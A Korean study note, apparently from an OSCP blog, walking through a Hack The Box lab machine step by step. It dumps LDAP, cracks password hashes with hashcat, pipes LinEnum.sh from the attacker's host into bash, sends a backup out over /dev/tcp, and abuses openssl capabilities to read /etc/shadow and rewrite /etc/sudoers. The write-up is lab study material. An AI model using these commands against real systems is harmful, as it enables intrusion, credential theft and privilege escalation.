# ldapsearch -x -h 10.10.10.119 -s base namingcontexts
> namingcontexts 검색 후 아래 커맨드 입력
# ldapsearch -x -h 10.10.10.119 -b 'dc=lightweight,dc=htb'
ldap 데이터를 덤프할 수 있다.
> 유저 별 패스워드 해시를 별도로 파일로 저장 후 해시캣 실행
$ ./hashcat --example-hashes >> 모드 검색
seach > $6$
$ ./hashcat -m 1800 hash.file /usr/share/wordlist/rockyou.txt
ssh 접속시 tcpdump + 와이어 샤크로 패킷 확인
$ ssh 10.10.2.4@10.10.10.110 "/usr/sbin/ecpdump -i ens33 -U -s0 -w -"
$ ssh 10.10.2.4@10.10.10.110 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark
-k -i -ldap 패킷 확인 > authentication (인증 암호) 있을 수 있다.
투입 후 LinEnum.sh 실행
# python -m SimpleHTTPServer 80
--------------------
$ curl 10.10.2.4/LinEnum.sh | bash > 다운 없이 실행
netcat 없을 때 파일 전송
$ cat backup.7z > /dev/tcp/10.10.2.4/443
-------------------------------------
# ncat -lvnp 443 > backup.77z$ getcap *
$ ./openssl enc -in /etc/shadow
$ ./openssl enc -in /etc/sudoers
$ vi sudoers >> edit user
$ cat ./sudoers | ./openssl enc -out /etc/sudoers >> write files
728x90
반응형
'OSCP > OSCP 공부일지' 카테고리의 다른 글
| SQL Injection 모듬 (0) | 2021.12.11 |
|---|---|
| OSCP 시험 유형 변경 소식 (2) | 2021.12.03 |
| php 파일 업로드 우회 원리 (0) | 2021.11.24 |
| AD 공략 (feat.SMB + Impacket) (0) | 2021.11.24 |
| XXE 공략 (0) | 2021.11.23 |